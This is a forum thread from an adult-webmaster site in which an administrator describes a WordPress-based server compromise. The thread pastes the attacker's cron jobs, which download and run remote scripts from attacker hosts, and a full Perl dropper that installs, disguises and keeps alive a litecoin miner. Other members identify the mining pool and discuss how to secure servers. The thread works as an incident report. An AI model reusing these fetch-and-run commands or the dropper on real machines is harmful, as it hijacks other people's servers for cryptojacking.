GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Tech hacking Assholes (https://gfy.com/showthread.php?t=1142166)

sarettah 06-02-2014 03:23 PM
hacking Assholes
 
So, one of my servers was running at about 400% apparently.

When all was said and done it seems that someone used a WP hack on one of my clients WP installs and then managed to somehow gain shell access to set up 2 cron jobs, one under each of 2 different user accounts.

the cron job appears to create an instance of a bitcoin mining operation of some kind.

I found it being discussed here: http://serverfault.com/questions/598...-100-cpu-usage

This is one of the crons that was created:

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://95.154.227.98/.../libcfg.txt;curl -O http://95.154.227.98/.../libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt


************************************End of cron

And this is the little perl script that they pull in in the abc.txt file:

#!/usr/bin/perl
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall -9 named");
$rn=1;
$ar=`uname -m`;
while($rn==1 || $rn==0) { $rn=int(rand(11)); }
$exists=`ls /tmp/.Ice-unix`;
$cratch=`ps aux | grep -v grep | grep kernelcfg`;
$cratchx=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch=~/kernelcfg/gi || $cratchx=~/kernelupdates/gi) { die; }

if($exists!~/kernelcfg/gi) {
$wig=`wget --version | grep GNU`;
if(length($wig)<6) {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
} else {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
}
} else {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
} else {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
}
}
}

@prts=('8332','9091','1121','7332','6332','1332',' 9333','2961','8382','8332','9091','1121','7332','6 332','1332','9333','2961','8382');
$prt=0;
while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
print "setup for $rn:$prt done :-)\n";

while(1) {
$cratch=`ps aux | grep -v grep | grep kernelcfg`;
$cratchx=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch!~/kernelcfg/gi && $cratch!~/kernelupdates/gi) {
system("cd /tmp/.Ice-unix;./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
}
sleep(5);
}

************************************************** **

I am getting the idea that it is a bitcoin mining thing only because of some of the variable names in there and the discussion I linked to. I have not examined the code at all yet.

So, how many coins do you think they managed to do off my little server? I am guessing about .00000000001 BC across the week ;p

Nice_Nick 06-02-2014 03:33 PM
Maybe they were doing altcoins?

Or maybe they also attacked eery site on the server (if it's shared).

Hate hackers but can't help marvel at what they can do.

dantheman 06-02-2014 03:35 PM
what's up sarettah, long time no chat :winkwink:

sarettah 06-02-2014 03:52 PM
Quote:
Originally Posted by dantheman (Post 20109036)
what's up sarettah, long time no chat :winkwink:
Damn, Danny, yes. Long long time.

See you flying the M3 Button. You back with them? Or never left? Or what?

Edited in: See you have an M3 email address so I gues you are there.

Were you gone? Fill me in man. Expiring minds need to know ;p

And on that note. Just for the record. M3 picked up on the hack for me because of CPU usage. Then we spent most of the afternoon tracking down shit and making sure holes were patched. As always thanks to M3 - Travis, Chris, and Ryan this time - for all the help.


.

dantheman 06-02-2014 04:31 PM
Quote:
Originally Posted by sarettah (Post 20109072)
Damn, Danny, yes. Long long time.

See you flying the M3 Button. You back with them? Or never left? Or what?

Edited in: See you have an M3 email address so I gues you are there.

Were you gone? Fill me in man. Expiring minds need to know ;p

And on that note. Just for the record. M3 picked up on the hack for me because of CPU usage. Then we spent most of the afternoon tracking down shit and making sure holes were patched. As always thanks to M3 - Travis, Chris, and Ryan this time - for all the help.


.
I'm glad they were able to help you. They've been at this forever, no better hosting techs out there!
do you have ICQ add me, if so, if not, shoot me a email and I'll fill you in :thumbsup

UniqueD 06-02-2014 04:38 PM
mining litecoin, you can see at the end connecting to litecoin mining pool, wemineltc.com with the worker name "spdrman" some extra characters

6South 06-02-2014 05:00 PM
We get attacked an average of 5-12 times per day across the dozens of servers and hundreds of VPS accounts I admin.

In 5 years, we've had 1 compromise which was due to an inside job by someone at a provider who had access to their admin account passwords.

It's really not that hard to secure systems. You don't have to be completely paranoid because unless someone is specifically targeting you for attack most hacks are based on lazy ass script fags who look for the easy targets.

Ongoing monitoring with alerts via SMS allows you to catch the occasional zero day exploit and stop it before they completely wreck a system.

HostWanted 06-02-2014 05:13 PM
You can find out who this is by going here:

wemineltc.com

Subpeona them for their users info. They should be following KYC laws (Know Your Customer) if they are compliant. The username for their pool member is spdrman
and im sure by getting this info you will open a can of worms for that user because you will be able to see every server he/she has hacked in the pool account.

The line below configured the username truncated by a . to the worker name and uses any old password because pools typically do not use passwords....

system("cd /tmp/.Ice-unix;./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");


All times are GMT -7. The time now is 06:02 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123